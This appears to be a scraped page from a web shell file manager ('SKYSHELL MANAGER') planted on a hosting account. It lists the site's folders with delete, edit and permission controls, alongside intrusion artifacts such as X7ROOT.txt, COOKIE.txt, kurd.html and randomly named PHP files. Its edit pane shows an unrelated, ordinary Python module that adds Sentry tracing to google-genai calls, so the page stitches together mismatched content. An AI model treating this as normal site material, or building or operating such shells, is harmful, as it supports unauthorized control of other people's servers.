📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
12.43 KB
0555
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: __init__.py
"""Sentry integration for the ``google-genai`` SDK.

Monkey-patches ``google.genai.models.Models`` and ``AsyncModels`` so that
every ``generate_content`` / ``generate_content_stream`` call (sync and
async) is wrapped in a pair of Sentry spans:

* an outer ``invoke_agent`` span, and
* an inner ``chat`` span carrying the gen-AI request/response metadata.

For streaming calls the spans are entered manually and stay open until the
caller finishes (or abandons with an error) consuming the stream.
"""
from functools import wraps
from typing import (
    Any,
    AsyncIterator,
    Callable,
    Iterator,
    List,
)

import sentry_sdk
from sentry_sdk.ai.utils import get_start_span_function
from sentry_sdk.integrations import DidNotEnable, Integration
from sentry_sdk.consts import OP, SPANDATA
from sentry_sdk.tracing import SPANSTATUS

try:
    from google.genai.models import Models, AsyncModels
except ImportError:
    raise DidNotEnable("google-genai not installed")

from .consts import IDENTIFIER, ORIGIN, GEN_AI_SYSTEM
from .utils import (
    set_span_data_for_request,
    set_span_data_for_response,
    _capture_exception,
    prepare_generate_content_args,
)
from .streaming import (
    set_span_data_for_streaming_response,
    accumulate_streaming_response,
)


class GoogleGenAIIntegration(Integration):
    identifier = IDENTIFIER
    origin = ORIGIN

    def __init__(self, include_prompts=True):
        # type: (GoogleGenAIIntegration, bool) -> None
        # When True, prompt/response content may be attached to spans
        # (potentially sensitive data) by the set_span_data_* helpers.
        self.include_prompts = include_prompts

    @staticmethod
    def setup_once():
        # type: () -> None
        # Patch sync methods
        Models.generate_content = _wrap_generate_content(Models.generate_content)
        Models.generate_content_stream = _wrap_generate_content_stream(
            Models.generate_content_stream
        )

        # Patch async methods
        AsyncModels.generate_content = _wrap_async_generate_content(
            AsyncModels.generate_content
        )
        AsyncModels.generate_content_stream = _wrap_async_generate_content_stream(
            AsyncModels.generate_content_stream
        )


def _start_streaming_spans(integration, model_name, contents, kwargs):
    # type: (GoogleGenAIIntegration, Any, Any, Any) -> Any
    """Open the ``invoke_agent`` and ``chat`` spans shared by both streaming
    wrappers and populate their request data.

    The spans are entered manually (``__enter__``) because they must remain
    open until the caller has drained the returned stream; the matching
    ``__exit__`` calls happen in ``_finalize_streaming_spans`` (or in the
    wrapper's error path if the initial call itself raises).

    Returns the ``(agent_span, chat_span)`` pair.
    """
    span = get_start_span_function()(
        op=OP.GEN_AI_INVOKE_AGENT,
        name="invoke_agent",
        origin=ORIGIN,
    )
    span.__enter__()
    span.set_data(SPANDATA.GEN_AI_AGENT_NAME, model_name)
    span.set_data(SPANDATA.GEN_AI_OPERATION_NAME, "invoke_agent")
    set_span_data_for_request(span, integration, model_name, contents, kwargs)
    span.set_data(SPANDATA.GEN_AI_RESPONSE_STREAMING, True)

    chat_span = sentry_sdk.start_span(
        op=OP.GEN_AI_CHAT,
        name=f"chat {model_name}",
        origin=ORIGIN,
    )
    chat_span.__enter__()
    chat_span.set_data(SPANDATA.GEN_AI_OPERATION_NAME, "chat")
    chat_span.set_data(SPANDATA.GEN_AI_SYSTEM, GEN_AI_SYSTEM)
    chat_span.set_data(SPANDATA.GEN_AI_REQUEST_MODEL, model_name)
    set_span_data_for_request(chat_span, integration, model_name, contents, kwargs)
    chat_span.set_data(SPANDATA.GEN_AI_RESPONSE_STREAMING, True)
    chat_span.set_data(SPANDATA.GEN_AI_AGENT_NAME, model_name)

    return span, chat_span


def _finalize_streaming_spans(span, chat_span, chunks, integration):
    # type: (Any, Any, List[Any], GoogleGenAIIntegration) -> None
    """Record the accumulated streamed response on both spans, then close them.

    Called from the wrapper iterators' ``finally`` so the spans are closed
    whether the stream completes, raises, or is abandoned mid-iteration
    (generator close).
    """
    if chunks:
        accumulated_response = accumulate_streaming_response(chunks)
        set_span_data_for_streaming_response(
            chat_span, integration, accumulated_response
        )
        set_span_data_for_streaming_response(span, integration, accumulated_response)
    chat_span.__exit__(None, None, None)
    span.__exit__(None, None, None)


def _wrap_generate_content_stream(f):
    # type: (Callable[..., Any]) -> Callable[..., Any]
    """Wrap the sync ``Models.generate_content_stream`` with Sentry spans."""

    @wraps(f)
    def new_generate_content_stream(self, *args, **kwargs):
        # type: (Any, Any, Any) -> Any
        integration = sentry_sdk.get_client().get_integration(GoogleGenAIIntegration)
        if integration is None:
            return f(self, *args, **kwargs)

        _model, contents, model_name = prepare_generate_content_args(args, kwargs)
        span, chat_span = _start_streaming_spans(
            integration, model_name, contents, kwargs
        )

        try:
            stream = f(self, *args, **kwargs)

            # Wrapper iterator that accumulates chunks so the final response
            # can be recorded once the caller has drained the stream.
            def new_iterator():
                # type: () -> Iterator[Any]
                chunks = []  # type: List[Any]
                try:
                    for chunk in stream:
                        chunks.append(chunk)
                        yield chunk
                except Exception as exc:
                    _capture_exception(exc)
                    chat_span.set_status(SPANSTATUS.ERROR)
                    raise
                finally:
                    _finalize_streaming_spans(span, chat_span, chunks, integration)

            return new_iterator()

        except Exception as exc:
            # The initial call failed before any iteration: close the spans
            # opened above, since the iterator's finally will never run.
            _capture_exception(exc)
            chat_span.__exit__(None, None, None)
            span.__exit__(None, None, None)
            raise

    return new_generate_content_stream


def _wrap_async_generate_content_stream(f):
    # type: (Callable[..., Any]) -> Callable[..., Any]
    """Wrap the async ``AsyncModels.generate_content_stream`` with Sentry spans."""

    @wraps(f)
    async def new_async_generate_content_stream(self, *args, **kwargs):
        # type: (Any, Any, Any) -> Any
        integration = sentry_sdk.get_client().get_integration(GoogleGenAIIntegration)
        if integration is None:
            return await f(self, *args, **kwargs)

        _model, contents, model_name = prepare_generate_content_args(args, kwargs)
        span, chat_span = _start_streaming_spans(
            integration, model_name, contents, kwargs
        )

        try:
            stream = await f(self, *args, **kwargs)

            # Async mirror of the sync wrapper iterator above.
            async def new_async_iterator():
                # type: () -> AsyncIterator[Any]
                chunks = []  # type: List[Any]
                try:
                    async for chunk in stream:
                        chunks.append(chunk)
                        yield chunk
                except Exception as exc:
                    _capture_exception(exc)
                    chat_span.set_status(SPANSTATUS.ERROR)
                    raise
                finally:
                    _finalize_streaming_spans(span, chat_span, chunks, integration)

            return new_async_iterator()

        except Exception as exc:
            # The initial call failed before any iteration: close the spans
            # opened above, since the iterator's finally will never run.
            _capture_exception(exc)
            chat_span.__exit__(None, None, None)
            span.__exit__(None, None, None)
            raise

    return new_async_generate_content_stream


def _wrap_generate_content(f):
    # type: (Callable[..., Any]) -> Callable[..., Any]
    """Wrap the sync ``Models.generate_content`` with Sentry spans."""

    @wraps(f)
    def new_generate_content(self, *args, **kwargs):
        # type: (Any, Any, Any) -> Any
        integration = sentry_sdk.get_client().get_integration(GoogleGenAIIntegration)
        if integration is None:
            return f(self, *args, **kwargs)

        model, contents, model_name = prepare_generate_content_args(args, kwargs)

        with get_start_span_function()(
            op=OP.GEN_AI_INVOKE_AGENT,
            name="invoke_agent",
            origin=ORIGIN,
        ) as span:
            span.set_data(SPANDATA.GEN_AI_AGENT_NAME, model_name)
            span.set_data(SPANDATA.GEN_AI_OPERATION_NAME, "invoke_agent")
            set_span_data_for_request(span, integration, model_name, contents, kwargs)

            with sentry_sdk.start_span(
                op=OP.GEN_AI_CHAT,
                name=f"chat {model_name}",
                origin=ORIGIN,
            ) as chat_span:
                chat_span.set_data(SPANDATA.GEN_AI_OPERATION_NAME, "chat")
                chat_span.set_data(SPANDATA.GEN_AI_SYSTEM, GEN_AI_SYSTEM)
                chat_span.set_data(SPANDATA.GEN_AI_REQUEST_MODEL, model_name)
                chat_span.set_data(SPANDATA.GEN_AI_AGENT_NAME, model_name)
                set_span_data_for_request(
                    chat_span, integration, model_name, contents, kwargs
                )
                try:
                    response = f(self, *args, **kwargs)
                except Exception as exc:
                    _capture_exception(exc)
                    chat_span.set_status(SPANSTATUS.ERROR)
                    raise

                set_span_data_for_response(chat_span, integration, response)
                set_span_data_for_response(span, integration, response)

                return response

    return new_generate_content


def _wrap_async_generate_content(f):
    # type: (Callable[..., Any]) -> Callable[..., Any]
    """Wrap the async ``AsyncModels.generate_content`` with Sentry spans."""

    @wraps(f)
    async def new_async_generate_content(self, *args, **kwargs):
        # type: (Any, Any, Any) -> Any
        integration = sentry_sdk.get_client().get_integration(GoogleGenAIIntegration)
        if integration is None:
            return await f(self, *args, **kwargs)

        model, contents, model_name = prepare_generate_content_args(args, kwargs)

        with get_start_span_function()(
            op=OP.GEN_AI_INVOKE_AGENT,
            name="invoke_agent",
            origin=ORIGIN,
        ) as span:
            span.set_data(SPANDATA.GEN_AI_AGENT_NAME, model_name)
            span.set_data(SPANDATA.GEN_AI_OPERATION_NAME, "invoke_agent")
            set_span_data_for_request(span, integration, model_name, contents, kwargs)

            with sentry_sdk.start_span(
                op=OP.GEN_AI_CHAT,
                name=f"chat {model_name}",
                origin=ORIGIN,
            ) as chat_span:
                chat_span.set_data(SPANDATA.GEN_AI_OPERATION_NAME, "chat")
                chat_span.set_data(SPANDATA.GEN_AI_SYSTEM, GEN_AI_SYSTEM)
                chat_span.set_data(SPANDATA.GEN_AI_REQUEST_MODEL, model_name)
                # Consistency fix: the sync wrapper records the agent name on
                # the chat span; the async path previously omitted it.
                chat_span.set_data(SPANDATA.GEN_AI_AGENT_NAME, model_name)
                set_span_data_for_request(
                    chat_span, integration, model_name, contents, kwargs
                )
                try:
                    response = await f(self, *args, **kwargs)
                except Exception as exc:
                    _capture_exception(exc)
                    chat_span.set_status(SPANSTATUS.ERROR)
                    raise

                set_span_data_for_response(chat_span, integration, response)
                set_span_data_for_response(span, integration, response)

                return response

    return new_async_generate_content
Save